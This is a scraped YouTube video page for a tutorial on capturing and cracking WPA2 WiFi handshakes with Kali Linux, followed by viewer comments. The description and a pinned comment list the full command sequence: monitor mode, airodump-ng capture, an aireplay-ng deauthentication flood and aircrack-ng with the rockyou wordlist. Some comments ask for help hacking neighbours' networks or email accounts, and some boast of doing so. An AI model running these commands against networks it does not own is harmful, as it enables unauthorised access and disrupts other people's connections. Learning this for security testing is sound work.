Cracking WiFi WPA2 Handshake

Поділитися
Вставка
  • Опубліковано 18 чер 2024
  • Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video.
    Menu:
    Use airmon-ng to crack WiFi networks: 0:00
    Network Adapter to use: 0:46
    Kali Linux setup: 1:20
    Plug in network adapter: 1:35
    Verify that network adapter is recognized by Kali Linux: 2:04
    WPA2 network to crack: 2:43
    iwconfig: 3:27
    Kali Version: 3:34
    Kill conflicting processes with airmon-ng: 3:55
    Put interface into monitor mode: 4:32
    Discover WiFi Networks with airodump-ng: 5:15
    Use airodump-ng to view only one network: 6:20
    Connect to network using an iPhone: 6:39
    airodump-ng capture WPA2 four way handshake: 6:58
    Use aireplay-ng to deauthenticate clients: 7:25
    WPA2 four way handshake captured: 8:08
    Use Wireshark to view WPA2 four way handshake: 8:38
    Put interface back into managed mode: 9:30
    Crack WPA2 password with aircrack-ng: 10:10
    Password cracked: 11:00
    WiFi router WPA2 settings: 12:00
    Summary: 12:40
    ================
    Network Adapters:
    ================
    Alfa AWUS036NHA: amzn.to/3qbQGKN
    Alfa AWUSO36NH: amzn.to/3moeQiI
    ================
    Commands used:
    ================
    ! See version of Kali
    cat /etc/os-release
    uname -a
    ! See interfaces
    ip addr
    iwconfig
    !kill processes
    sudo airmon-ng check kill
    !Start monitor mode
    sudo airmon-ng start wlan0
    !Verify that monitor mode is used
    sudo airmon-ng
    !You could also use iwconfig to check that interface is in monitor mode:
    iwconfig
    ! Get the AP's MAC address and channel
    sudo airodump-ng wlan0mon
    ! AP-MAC & channel - you need to select your own here:
    ESSID: 90:9A:4A:B8:F3:FB
    Channel used by AP for SSID: 2
    !1st Window:
    !Make sure you replace the channel number and bssid with your own
    !Replace hack1 with your file name like capture1 or something
    sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon
    !2nd Window - deauth attack
    !Make sure you replace the bssid with your own
    sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon
    !Use Wireshark to open hack file
    wireshark hack1-01.cap
    !Filter Wireshark messages for EAPOL
    eapol
    !Stop monitor mode
    airmon-ng stop wlan0mon
    !Crack file with Rock you or another wordlist
    !Make sure you have rockyou in text format (unzip file on Kali)
    !Replace hack1-01.cap with your file name
    aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
    ================
    Previous videos:
    ================
    Kali Installation: • Kali Linux 2020.3 inst...
    WPA2 GPU password cracking: • Brute force WiFi WPA2
    Wordlists (rockyou): • rockyou
    ================
    Connect with me:
    ================
    Discord: / discord
    Twitter: / davidbombal
    Instagram: / davidbombal
    LinkedIn: / davidbombal
    Facebook: / davidbombal.co
    TikTok: / davidbombal
    UA-cam: / davidbombal
    ================
    Support me:
    ================
    Buy my CCNA course and support me:
    DavidBombal.com: CCNA ($10): bit.ly/yt999ccna
    Udemy CCNA Course: bit.ly/ccnafor10dollars
    GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10
    ======================
    Special Offers:
    ======================
    Boson software: 15% discount
    Link: bit.ly/boson15
    Code: DBAF15P
    wifi
    kali linux
    kali linux 2020
    kali linux 2020.4
    wifite
    wpa
    wep
    wps
    alfa
    comptia
    ceh
    oscp
    wifi
    airmon-ng
    aircrack-ng
    hack
    hacker
    hacking
    ethical hacking
    kali
    ine
    Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
    #wifi #wpa2 #kalilinux
  • Наука та технологія

КОМЕНТАРІ • 1,5 тис.

  • @davidbombal
    @davidbombal  3 роки тому +221

    Menu:
    Use airmon-ng to crack WiFi networks: 0:00
    Network Adapter to use: 0:46
    Kali Linux setup: 1:20
    Plug in network adapter: 1:35
    Verify that network adapter is recognized by Kali Linux: 2:04
    WPA2 network to crack: 2:43
    iwconfig: 3:27
    Kali Version: 3:34
    Kill conflicting processes with airmon-ng: 3:55
    Put interface into monitor mode: 4:32
    Discover WiFi Networks with airodump-ng: 5:15
    Use airodump-ng to view only one network: 6:20
    Connect to network using an iPhone: 6:39
    airodump-ng capture WPA2 four way handshake: 6:58
    Use aireplay-ng to deauthenticate clients: 7:25
    WPA2 four way handshake captured: 8:08
    Use Wireshark to view WPA2 four way handshake: 8:38
    Put interface back into managed mode: 9:30
    Crack WPA2 password with aircrack-ng: 10:10
    Password cracked: 11:00
    WiFi router WPA2 settings: 12:00
    Summary: 12:40
    ================
    Network Adapters:
    ================
    Alfa AWUS036NHA: amzn.to/3qbQGKN
    Alfa AWUSO36NH: amzn.to/3moeQiI
    ================
    Commands used:
    ================
    ! See version of Kali
    cat /etc/os-release
    uname -a
    ! See interfaces
    ip addr
    iwconfig
    !kill processes
    sudo airmon-ng check kill
    !Start monitor mode
    sudo airmon-ng start wlan0
    !Verify that monitor mode is used
    sudo airmon-ng
    !You could also use iwconfig to check that interface is in monitor mode:
    iwconfig
    ! Get the AP's MAC address and channel
    sudo airodump-ng wlan0mon
    ! AP-MAC & channel - you need to select your own here:
    ESSID: 90:9A:4A:B8:F3:FB
    Channel used by AP for SSID: 2
    !1st Window:
    !Make sure you replace the channel number and bssid with your own
    !Replace hack1 with your file name like capture1 or something
    sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon
    !2nd Window - deauth attack
    !Make sure you replace the bssid with your own
    sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon
    !Use Wireshark to open hack file
    wireshark hack1-01.cap
    !Filter Wireshark messages for EAPOL
    eapol
    !Stop monitor mode
    airmon-ng stop wlan0mon
    !Crack file with Rock you or another wordlist
    !Make sure you have rockyou in text format (unzip file on Kali)
    !Replace hack1-01.cap with your file name
    aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
    ================
    Previous videos:
    ================
    Kali Installation: ua-cam.com/video/VAMP8DqSDjg/v-deo.html
    WPA2 GPU password cracking: ua-cam.com/video/J8A8rKFZW-M/v-deo.html
    Wordlists (rockyou): ua-cam.com/video/rgWcguAg-XA/v-deo.html
    ================
    Connect with me:
    ================
    Discord: discord.com/invite/usKSyzb
    Twitter: twitter.com/davidbombal
    Instagram: instagram.com/davidbombal
    LinkedIn: www.linkedin.com/in/davidbombal
    Facebook: facebook.com/davidbombal.co
    TikTok: tiktok.com/@davidbombal
    UA-cam: ua-cam.com/users/davidbombal
    ================
    Support me:
    ================
    Buy my CCNA course and support me:
    DavidBombal.com: CCNA ($10): bit.ly/yt999ccna
    Udemy CCNA Course: bit.ly/ccnafor10dollars
    GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10
    ======================
    Special Offers:
    ======================
    Boson software: 15% discount
    Link: bit.ly/boson15
    Code: DBAF15P
    Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

    • @AjaySharma-007
      @AjaySharma-007 3 роки тому +3

      You way to explain is very good ,please keep it up... Please make some video on windows admin password bypass or hacking or email account hacking ..Thanks

    • @wilfredocal8557
      @wilfredocal8557 3 роки тому +6

      please hack my neighbors wifi

    • @mobiousenigma
      @mobiousenigma 3 роки тому +3

      your teaching thieves or want to be thieves! the man pages for aircrack-ng and others in the suite is more than enough information or tutorial for any ethical use! fortunately the reality of wpa2 with 1x8^120 to 1x64^120 possibilities and roughly a 3000 keys per second with descent hardware a 100 to 10000 year run is unpractical. collecting ssid and handshakes and mac addresses is easy dose not even require linux or monitor mode but brute forcing any strong password over 14 chars long is not going to happen , you should examine your ethics sir because your audience isnt going to set up a pertest lab or ask permission of a network owner no matter how many times you ask them not to! anyone with any true interest in pen testing will have enough system and network admin knowledge to be functional with a man page nor would they require the detailed explanations you give on basic principals. hopefully no one you care about becomes a victim of someone you taught

    • @itsme7570
      @itsme7570 3 роки тому +1

      Hey, I've followed this tutorial and for some reason my deauth attack isn't working. I've even tried mdk4 and it's just not kicking me from the network and not capturing the handshake. I've looked all over the internet for a solution but have yet to find one. So now I ask you! David Bombal community, if you are here then you are most likely highly intelligent. How about sharing some knowledge with your boy

    • @mobiousenigma
      @mobiousenigma 3 роки тому

      @@itsme7570 you followed the tutorial and its not working....... do you understand what you are doing? its a signal strength issue...you have one radio connected to another and a third is trying to say louder no not that radio this one.....but it isnt louder than the first radio so you get squat....now why are you trying to learn how to steal?

  • @78inn
    @78inn 3 роки тому +5

    You are my favorite. You talk so clearly and demonstrate in clean way.

  • @paulmacgiollacaoine8619
    @paulmacgiollacaoine8619 3 роки тому +53

    Such a great format, you make it seem so simple ❤️👍

  • @aty4282
    @aty4282 3 роки тому +267

    David: only attack networks that *you own*
    Me: well, i basically "own" the network after im in- *gets sent to gulag*

  • @arnaldogonzalez1
    @arnaldogonzalez1 2 роки тому

    backtrack was my introduction to Linux / cybersecurity back in 2008. So glad that I kept digging at it, best decision ever

  • @Steve_be
    @Steve_be 3 роки тому +12

    This for me is the best presented shows on YT its given me so much pleasure and being retired keeps me busy lerning thank you sir.

  • @KacangNgoding
    @KacangNgoding 2 роки тому +21

    Ah, finally, I found a proper way to learn about network security.

  • @user-xd4sb5rq4o
    @user-xd4sb5rq4o 3 роки тому +40

    After watching first video in your channel, It took only 2 minutes to decide weather i want to subscribe your channel or not. Love this. Such an awesome presentation. ♥

    • @XYElement72
      @XYElement72 Рік тому

      Does WiFi hacking damage the phone's battery?
      Is there a virus that can damage the battery through Wi-Fi?

  • @deckieb1
    @deckieb1 3 роки тому +21

    I am 56 and you make this all so interesting and easy. I love what you do and cant thank you enough for educating me.

  • @thats-not-my-name2078
    @thats-not-my-name2078 3 роки тому +42

    Such a clear and well communicated lesson definitely will be watching more of your videos and looking at your courses, thank you for this great lesson David!

    • @davidbombal
      @davidbombal  3 роки тому +2

      Thank you Bryce!

    • @MoviesForFun-zm6jv
      @MoviesForFun-zm6jv 5 місяців тому +1

      hi please make a full video about evil twin attack
      @@davidbombal

  • @69rogefer
    @69rogefer Рік тому +17

    Hey! Mr. David Bombal, thanks a million. I am from Tijuana, Mexico, I am 53, and I just get this "KALI LINUX" os, with knowing nothing what so ever about this LINUX SYSTEM. So, as you can imagine, I've whatched so many video tutorials, and well, I'm a little confused with all this commands, and passwords, but I'm doing a little progres in understanding the basics. And let me tell you, that until I watched your video here, I finally get to run the tools in the AIRCRACK-NG SUITE. The way you exp;ain step by step, it"s so clear, THAT EVEN ME GET TO UNDERSTAND WHAT TO DO, AND WHAT EXACTLY IS THE PROGRAM DOING WITH EACH ONE OF THE COMMANDS. THANK YOU SIR. I hope that my written engish is not so bad, and you get may gratitude.

  • @ak11230
    @ak11230 2 роки тому +2

    I am computer consultant 1991 Melbourne Fl . Degree in electric engineering major computer input -output
    I did make living recovering , braking password , Old days 500 dollars maybe 1 hours ?
    Upset employees password all network and quit many times . . I really thanks You David deep from my heart for educating young people ... We needed that in America ...

  • @ryanlea750
    @ryanlea750 2 роки тому

    A great video we went over this in class I had notes to the best of the circumstances lectures happen fast. This helped me fill in the holes. Great video. Thank you!

  • @nonegone7170
    @nonegone7170 3 роки тому +36

    Brilliantly made video as we've all come to expect from you, David.
    Really invigorates the motivation to keep at it.
    Keep it up!

    • @davidbombal
      @davidbombal  3 роки тому +8

      Thank you!

    • @Manishkumar-dj6kl
      @Manishkumar-dj6kl 2 роки тому +2

      @@davidbombal sir plz make video on how to create backdoor through wifi🙏

    • @TheOneAndOnlyNomad
      @TheOneAndOnlyNomad 5 місяців тому

      @@Manishkumar-dj6kl that's sound mighty like malicious intent

  • @sandalysandaly6000
    @sandalysandaly6000 3 роки тому +9

    I must say that you are indeed an excellent teacher.
    You did not explain what to do after I have the HANDSHAKE
    I'll be glad to hear from you.
    Thank you very much.

  • @eliasmierau5421
    @eliasmierau5421 2 роки тому

    I just saw this video and right away had to subscribe, absolute wonderful!! you make it look so simple, thank you so very much!

  • @elsoyboy3977
    @elsoyboy3977 2 роки тому

    Excelente video, thank you so much, I saw many blogs and they didn't explain as good as you.
    I thought I wouldn't find videos like this in UA-cam jajaja.

  • @dr.-a
    @dr.-a 2 роки тому +54

    I Love your setup and the blue back light, your way of explaining things is very easy to understand, you should consider teaching a CEH course online or in Udemy
    Thank You Sir Mad Respect 🙏🏼

    • @stevenjacobs4329
      @stevenjacobs4329 2 роки тому +1

      He teaches on Udemy too, amazing teacher. courses are free on youtube but for people that can afford they can support him on Udemy

    • @Billofx...
      @Billofx... Рік тому

      u b naija boss man

  • @nicolasnoka
    @nicolasnoka 2 роки тому +3

    Just if somebody is having issues with VM, I was not able to find any SSIDs until I changed my VM network configuration. I changed to Bridge and it worked. I am still new on this and I will keep doing research. Thanks David for all the good work here!

    • @steveortiz1026
      @steveortiz1026 Місяць тому

      hey your comment is 2 years old i did what you said but i still don't see any ssids should i set the Promiscuous Mode to Allow VMs vs Allow All? please help

  • @niklasd6149
    @niklasd6149 3 місяці тому

    Thank you, very straight forward. I like that. You talk about the vital things without nonsens. That is a real pro.

  • @gtheentreprenerd7207
    @gtheentreprenerd7207 Рік тому

    David I really like your channel, the more and more I watch your video.
    I Lovve how descriptive you are explaining things

  • @deepakchalise9653
    @deepakchalise9653 2 роки тому +95

    Do u really think all the people are here for education purpose 😂🗿

    • @slicybtw
      @slicybtw 2 місяці тому +9

      Nah hes using it as a excuse.

    • @sino6834
      @sino6834 2 місяці тому +7

      Yep it's just for educational purposes😊

    • @yamuna6838
      @yamuna6838 2 місяці тому +1

      😊😏😎

    • @Opinion_Box82
      @Opinion_Box82 2 місяці тому

      😂😂😂

    • @moogiibat5845
      @moogiibat5845 2 місяці тому +3

      I am

  • @garcand
    @garcand 3 роки тому +14

    David, you have been killing it with hacking videos! Thank you Sir, you're a great teacher !

    • @davidbombal
      @davidbombal  3 роки тому +2

      Thank you Andrew!

    • @peterbefreebrothasandsista2465
      @peterbefreebrothasandsista2465 3 роки тому

      I get get locked up for it yet he gets a fucking superstardom even gets paid for it the fucking irony.

    • @notahacker2107
      @notahacker2107 3 роки тому +1

      @@peterbefreebrothasandsista2465 because he’s not using it as a black hat hacker that’s why.

    • @peterbefreebrothasandsista2465
      @peterbefreebrothasandsista2465 3 роки тому +1

      Deven I think you miss the point for those that will use it for malicious intentions like noobs and the likes of he has give a demonstration of the very thing and precise education on how to he might as well have done now giving as incompetent it be presenting yourself to be a cyber security specialist it’s a bit of irony don’t you think of teaching people how to crack a WiFi network what’s it for other cyber security analysts that would already have taught that it college or perhaps anywhere else that give a recognised certificate in giving you implement security against such things what’s is it for a reminder on how to do it right or perhaps a procedure just in case you checking for vulnerability’s or the strength of the key the point is Deven that he is showing the world as in how to crack a network illegally on a public platform which I think you missed wither he is using it for black hat or not or he considers himself white he has give a class on how break into a WiFi network why not teach as it’s presented how to stop such attacks as in a class on ips or ids with maybe how to compile a firewall like P-fense highlighted comment well if someone breaks into my network i will tell the government it’s cyber analyst taught them how and hold them to account the fucking irony he’s not using it for black-hat he might as well.

    • @nabildahmani8286
      @nabildahmani8286 2 роки тому

      @@davidbombal what's the attack name and the protocol used ??????

  • @elScrimbloBimblo
    @elScrimbloBimblo Рік тому +1

    this helped me find so many flaws in my network setup. THANK YOU for this educational video, this kind of attack is very common in my area and I can now make it difficult for CTRL+V script kids to scan/connect my network.

  • @slashingbison2503
    @slashingbison2503 Рік тому +1

    Great training video learnt a lot, had a few issues along the way that were resolved and my understanding is much better, hope i can start to remember some commands there is so much syntax is Linux.

  • @CyberAbyss007
    @CyberAbyss007 3 роки тому +9

    Thanks for the great content! I've done some of this in Virtual Box. I did notice that VMs can be picky about the brand or version of wi-fi devices. Some better than others. Looking forward to duplicating this video in my lab environment. :-)

    • @mobiousenigma
      @mobiousenigma 3 роки тому

      its the adapters chipset some do not support instructions given in airx-ng ,,and vms in general have issues with internal hardware and ownership so usb adapters sidestep that issue

    • @harvindersingh4411
      @harvindersingh4411 2 роки тому

      @@mobiousenigmaI am using kali in a virtual box but it won't show me the wireless network as it reads that network as an internal network and shows it as a wired network (eth0) instead. How to fix it?

    • @mobiousenigma
      @mobiousenigma 2 роки тому

      @@harvindersingh4411 its not broken thats how virtual machines work. if you want wireless in a virtual desktop it needs to be usb.

    • @harvindersingh4411
      @harvindersingh4411 2 роки тому +1

      @@mobiousenigma So that means I can't use the internal adapter as a wireless network in virtual box?

    • @mobiousenigma
      @mobiousenigma 2 роки тому

      @@harvindersingh4411 dual boot

  • @georgeschmitz4422
    @georgeschmitz4422 3 роки тому +4

    Hi David,
    Easy to follow your steps. But how to go about if the AP (WPA2 CCMP PSK) does not bring out a EAPoL?
    Do I just have to try to go with Hashcat instead? This would eliminate Wireshark as well?
    Thank You Georg

  • @MichaelBeamTheMan
    @MichaelBeamTheMan 6 місяців тому

    Great video. I'm 55 years old and just starting my path. I have always loved technology. My parents would drop me at radio shack and I would play on the old tandy's for hours. I learned alot from this video and it helped me to make more sense of things. Thanks for sharing.

  • @jasondevaladares8391
    @jasondevaladares8391 6 місяців тому +1

    AMAZINGLY well put together, researched and shown. This helped me with a CTF I was doing.

  • @ABDR._.
    @ABDR._. 3 роки тому +4

    Nice video Mr.David You are The Best Keep Going 👏👏👏👏👏

    • @davidbombal
      @davidbombal  3 роки тому +1

      Thank you. I really appreciate that :)

  • @joelsquispe5645
    @joelsquispe5645 3 роки тому +5

    Very well explained. I'm starting in cybersecurity thanks to you! :)

    • @davidbombal
      @davidbombal  3 роки тому +2

      Thank you Joel. That's fantastic!

    • @TravelToday1
      @TravelToday1 3 роки тому +1

      hey thank u but there is a problem when I type sudo airman-ng its still on wlan0 not wlan0mon why???

  • @rxop184
    @rxop184 2 роки тому +1

    it requires a huge practical knowledge and consistent practice to be like u :)

  • @claudekellygbeu4705
    @claudekellygbeu4705 Рік тому

    this is by far the best tutorial and demonstration of airmon/aircrack.

  • @silviacarlosamachasoy8189
    @silviacarlosamachasoy8189 3 роки тому +6

    Hola.
    Te quería agradecer por tu gran conocimiento aportado, me ha sido de mucha utilidad para manejar este sistema.
    Cuidate y gracias ☺️👍

  • @Anatol_SG
    @Anatol_SG 3 роки тому +42

    2:50 "Here I have a TP-link router, which I've purchased" Yes, Mr Bombal, we believe you!
    That's my way of hacking WiFis by stealing the whole network adapter 😂

    • @davidbombal
      @davidbombal  3 роки тому +16

      lol... great comment. Yes, easier to just take the whole device. Got to demonstrate that I'm using my own devices so I don't get into trouble.

    • @grandmakisses9973
      @grandmakisses9973 3 роки тому +1

      LOL

    • @sarthaksharma6029
      @sarthaksharma6029 3 роки тому

      @@davidbombal I am a beginner but I want to study Ethical hacking please anyone help me what to learn and from where????

    • @mariab0209
      @mariab0209 3 роки тому

      For the routers o módems Tp link and Belkin is easy to hack ? Mr Bombal ? In Windows is posible ? Or only in kali Linux ?

    • @grandmakisses9973
      @grandmakisses9973 3 роки тому

      @@mariab0209 esc que je alle a toulitet

  • @itzuleanu
    @itzuleanu 5 місяців тому +2

    I followed a lot of tutorials but none worked but this worked for me thanks men i appreciate it ❤❤

  • @PiyushAggarwal0
    @PiyushAggarwal0 2 роки тому

    thank you David! I just subbed, great videos! Much love from pentesting enthusiasts in India :D

  • @juancamilomedinagarzon1375
    @juancamilomedinagarzon1375 2 роки тому +6

    Mil gracias amigo los subtitulos traducidos funcionan perfectamente y se te entiende muy bien.

  • @prospect8245
    @prospect8245 Рік тому +10

    That wordlist only really works if you live in a country where english is the main language though it seems

  • @sunderskoranga
    @sunderskoranga 5 місяців тому +1

    My lenovo laptop has intel wireless adapter with monitor capablity. Installed kali linux on usb drive and cracked the password. Great tutorial. Thanks.

  • @misterz5908
    @misterz5908 2 роки тому +2

    I know many people have told you What I am about to tell you.
    You are the best!👍😎

  • @johnskrabut7235
    @johnskrabut7235 2 роки тому +14

    Just a heads up, the router ESSID names you have redacted are visible for a brief period of time between timestamp 6:49 and 6:50. Also, thank you for the video! Very informative and simplified.

    • @khalidnoor2556
      @khalidnoor2556 2 роки тому +3

      idk why but after doing airodump-ng i dont discover any wifi

    • @Alex-ln9on
      @Alex-ln9on Рік тому

      Hey, try airmon-ng check kill

    • @Alex-ln9on
      @Alex-ln9on Рік тому

      Make sure your network adapter supports monitor mode and packet injection.

    • @SilverWolf-rz4bq
      @SilverWolf-rz4bq 11 місяців тому +1

      ​@@khalidnoor2556btw did you figure it out? cos even I'm facing the same issue here

    • @sankalpnaik877
      @sankalpnaik877 11 місяців тому

      ​@@SilverWolf-rz4bqdid u figure out

  • @asdfssdfghgdfy5940
    @asdfssdfghgdfy5940 Рік тому +7

    Something I'd recommend if you are using kali in a live environment (i.e. it isn't your main system you are doing anything on) is to sudo su so you don't have to type sudo before every command. Especially useful when you are learning.

    • @user-vk2cd9qw7i
      @user-vk2cd9qw7i 10 місяців тому +1

      yeah make sure it's not your main system LOL I don't want to think about how much data has been lost to people not realizing they're superuser and rm rf ing their whole file system

    • @asdfssdfghgdfy5940
      @asdfssdfghgdfy5940 10 місяців тому

      @@user-vk2cd9qw7i or in the case of Gitlab using it on the wrong system

  • @user-xd4sb5rq4o
    @user-xd4sb5rq4o 3 роки тому

    You have good contents as always... Always you are complete with the topic which you are streaming

  • @samantasunanda
    @samantasunanda 2 роки тому +1

    I think I just found a gem YT channel, thanks David for being an amazing guide.

  • @ABDR._.
    @ABDR._. 3 роки тому +6

    Good Content Mr.David 👏👏👏👏👏👏

  • @mrrobot4840
    @mrrobot4840 3 роки тому +7

    i tested this thing when i was in school on my second router information wasn't available like that at that time it was my passion to learn new stuff but now life has changed so much I don't even have the time to play games or watch tv

  • @MaZeR98765
    @MaZeR98765 2 роки тому

    Did this in college! Very good demo :)

  • @campursarimania
    @campursarimania 6 місяців тому

    just happen to have a TPLink WN722 layin around and doing test on my own network. tutorial works great. thank you

  • @facttrendz1314
    @facttrendz1314 3 роки тому +29

    while(True):
    print("David sir is great")

  • @cthoadmin7458
    @cthoadmin7458 3 роки тому +4

    Hi David, you seem to be a cut above the other UA-cam presenters in this subject. I suspected you might be a professional presenter, and it looks like you are... QUESTION: do you have a course or series of courses that would get me to a stage where I could sit for the Cisco CCNA exams with a reasonable expectation of passing them? Then maybe the CCNA Security specialties? Money no object my company will pay...

  • @sidmovich
    @sidmovich Рік тому

    Thank you for the lesson, finaly learned how to use aireplay and etc, doing all this lesson steps via a rapsberrypi 3b+ , in the end it takes about 8 hours or more to crack the password, if aircrack can do it, probably better to store the .cap file in a usb drive and crack it using my main pc to see the results (do this on your own network, deauth will make the network unusable while running, so probably your neighbor that makes a lot of noise will notice it)

  • @MrRahul123919
    @MrRahul123919 2 роки тому

    Hello sir. I hv seen lots n lots video different kind of tutorials. But the ur way of explanation. It really outstanding. It's very feel us easy even hard concept

  • @marco201ful
    @marco201ful 3 роки тому +4

    Keep it coming!!!! But please update your Udemy course with these Videos 😁

  • @potato_joe101
    @potato_joe101 2 роки тому +3

    Great! Now I can mess with- uh I mean “demonstrate” my new skills to my friends!

  • @wsurferdude_ct
    @wsurferdude_ct Рік тому

    Valuable info! I can test my password conventions against a commonly used wordlist which is most apt to be used against me. Thanks!

  • @ramgopalkrishnapandu
    @ramgopalkrishnapandu 3 роки тому

    Clear and crisp... Thanks for the video... you nailed it.. :-)

  • @theodorecandela3415
    @theodorecandela3415 3 роки тому +5

    When I put my card in monitor mode and remove it from monitor mode with the airmon-ng commands , iw dev still shows it in monitor mode.
    Also airmon-ng doesn't rename it to wlan0mon, it stays at wlan0, but monitor mode works.

    • @krakowiaczek1939
      @krakowiaczek1939 2 роки тому

      did you find the solution to the problem? i have tl-wn725n, and i can't start wlan0mon :(

  • @havishgahlot6542
    @havishgahlot6542 3 роки тому

    Thanks sir for the information you explain each and every command which makes it easier to understand......
    Love from India!

  • @apaicuh
    @apaicuh 2 роки тому +1

    nice , 8 hours and 40 minute time left. great tutorial

  • @ImParzelli
    @ImParzelli 3 роки тому +148

    Do you have classes? I'm grown but if my parents ever asked me who i wanted to be like when i grew up, i would say: David Bombal LOL

  • @tonymontana8622
    @tonymontana8622 2 роки тому +2

    Hi,
    If you capture more than 1 handshake, let's say you capture 9 handshakes, how can you reduce the number of handshakes in the cap file to make the cracking less redundant?

    • @jeramiahclark9826
      @jeramiahclark9826 Рік тому

      did you resolve this? i tried two cap files first one said denied access, cap2 file works

    • @natkhatlonda
      @natkhatlonda 8 місяців тому

      ​@@jeramiahclark9826hey why isn't airodump-ng showing any bssid?
      How can I solve this problem?

  • @user-mo9wc8sy3t
    @user-mo9wc8sy3t 11 місяців тому

    Ευχαριστώ για αυτό το υπέροχο μάθημα David!

  • @auldcrow1461
    @auldcrow1461 2 роки тому

    Clear tutorial, you gained a sub. Unsure why 318 folk disliked this

  • @suriyasundaram5987
    @suriyasundaram5987 3 роки тому +4

    hey david... although i did all the steps correctly after the deauthentication i dont get a wpa handshake
    .. pls help me through this

    • @happygujjar7254
      @happygujjar7254 3 роки тому

      Same here bro didn't get the wpa handshake

    • @msubhietamam5720
      @msubhietamam5720 3 роки тому

      You will not getting the handshake if there was no known device try to connect to the network. You need to wait until a known device connecting to the target wifi. It consumes time.

    • @happygujjar7254
      @happygujjar7254 3 роки тому

      @@msubhietamam5720 ok got your point.
      You make me to dive into again.

    • @msubhietamam5720
      @msubhietamam5720 3 роки тому

      @@happygujjar7254 happy cracking then! 😊

  • @ujithadharshana7397
    @ujithadharshana7397 3 роки тому +3

    lets crack it sir , Love Kali

  • @MUHAMMADAZEEM-zv7mc
    @MUHAMMADAZEEM-zv7mc 3 роки тому

    wonderful good work and very informative video on wifi cracking than other youtubers

  • @hansvanderlinden6545
    @hansvanderlinden6545 3 роки тому +1

    Thanks David. Learned a lot. Appreciate your tranquility when you're talking. It makes it easy to follow. I want to use the learnings for hardening my own security. In this respect my two questions are the following. I use mac address authentication for my wireless LAN (as opposed to wifi internet access for guests) and the SSID for it is not being broadcasted. Makes these two measures my LAN more difficult to hack. Thanks for your answer in advance.

  • @An.Individual
    @An.Individual 3 роки тому +8

    Good video but I think this is still brute forcing and will not work against a good password.
    I think the most effective attack on WPA2 is Fluxion and I wish David would demonstrate Fluxion so people will recognise it and not fall for it (like I did)

    • @acidhauss7018
      @acidhauss7018 Рік тому

      Agree all wifi passwords are nonstandard out of the box e.g. e7xjedhjd

  • @gojo1825
    @gojo1825 Місяць тому +4

    Nothing is working for me 😞

  • @deanbp4
    @deanbp4 3 роки тому +1

    What camera and lighting do you use for your video presentations? It all looks very good.

  • @hamzausman7801
    @hamzausman7801 2 роки тому +1

    After a long time I found a suitable video. Thanks man. And I also wanna request that will you please upload videos on teaching c++, http and other programming languages.

  • @birukaregu2798
    @birukaregu2798 2 роки тому +1

    Great tutorial, helped me a lot and thank you!

  • @AhmedAli-il5yx
    @AhmedAli-il5yx 2 роки тому +1

    You have such a great and easy way of explanation. Thank you for providing such valuable information

  • @shaydusty6087
    @shaydusty6087 3 роки тому +1

    Very informative and well explained - thankyou David

  • @ayze3718
    @ayze3718 2 роки тому +1

    Well explained David you did a great job
    😎👍

  • @cdm297
    @cdm297 3 роки тому

    Excellent video David. Out of curiosity how did you get your terminal prompt to look so beautiful. Mine looks sooo plain... Can you please share the secret? 🙏👍👌

  • @younglabel2374
    @younglabel2374 9 місяців тому

    Thank you very much ....this is my home .....I will forever rely on your videos

  • @trojankit
    @trojankit Рік тому +2

    Hi David, please on your vmware configuration, did you use NAT or Bridged network to work with the adapter...thanks... I'll appreciate a response

  • @MdJahidulIslam-cj3tm
    @MdJahidulIslam-cj3tm Рік тому

    You are awesome ❤❤. I have watched many of your videos❤❤

  • @Memnoch67
    @Memnoch67 3 роки тому

    Hey, interesting stuff you have. I am always searching for things I never knew anything about this will be added to my daily dose of mental exercises...(for educational purposes only of course) I have learned as we get older our memory starts slipping little by little and memory is the foundation for experience which is the foundation of intellect...ECT... Thank you and thumbs up I will SUB and occasionally share (unless instructed otherwise)

  • @vulkanoss3798
    @vulkanoss3798 Рік тому

    Well thanks to your tuto I've changed my Hotel GUEST wifi 1MB/s to Admin's WiFi with full speed

  • @binathon8020
    @binathon8020 3 роки тому

    Thank you so much !!! I’m learning

  • @bustsomecaps
    @bustsomecaps 3 роки тому

    awesome video im much more drawn to kali just for fun this stuff is just so interesting!

  • @leosaravia01
    @leosaravia01 2 роки тому +1

    Very nice info, there's still no better way to crack WPA2.... only if the WPS is active. Which version kali are you using? And that terminal looks so clean! very nice set up!

  • @ivanboard777
    @ivanboard777 2 роки тому +1

    Thank You A Lot Mr.David, very helpful videos. Greetings From Milano, Italy :-D

  • @MatheusBezerra93
    @MatheusBezerra93 8 місяців тому

    Great lesson. Greetings from Brazil.

  • @seifahmed24
    @seifahmed24 2 роки тому

    i have to tell you that you are great..this is the best channel i have ever seen ,and you have a talent in explaination..i would like to thank you,,and i hope some lessons about data recovery..please.

  • @Nexalian_Gamer
    @Nexalian_Gamer 3 місяці тому

    Thanks for the tutorial. Been using my neighbor's wifi for 3 months now. It only took my Pi 30 minutes to crack the password 👍👍

  • @m.mahdimoussawi5949
    @m.mahdimoussawi5949 Рік тому

    Thanks a lot for the demonstration
    Your explanation is obvious

  • @just_shim
    @just_shim Рік тому

    Amazing! I'm new in learning ethical hacking, your videos are very helpful!

  • @Headcase0570
    @Headcase0570 Рік тому +2

    I'm a bit late to this party, but thank you for the clear instructions in this video! In what video did you use a GPU to crack a non-listed password?

    • @sunuy192
      @sunuy192 Рік тому

      respectfully, search it up

  • @andysoto6272
    @andysoto6272 2 роки тому

    Amazing Course! Thanks a lot!

  • @zahidjaan1319
    @zahidjaan1319 3 роки тому

    Thank U Sir, Favourite as always !

  • @a21123
    @a21123 2 місяці тому

    You are a legend in my friend group Mr.Bombal

  • @jeffyramalhocardioworkouts
    @jeffyramalhocardioworkouts 2 роки тому +1

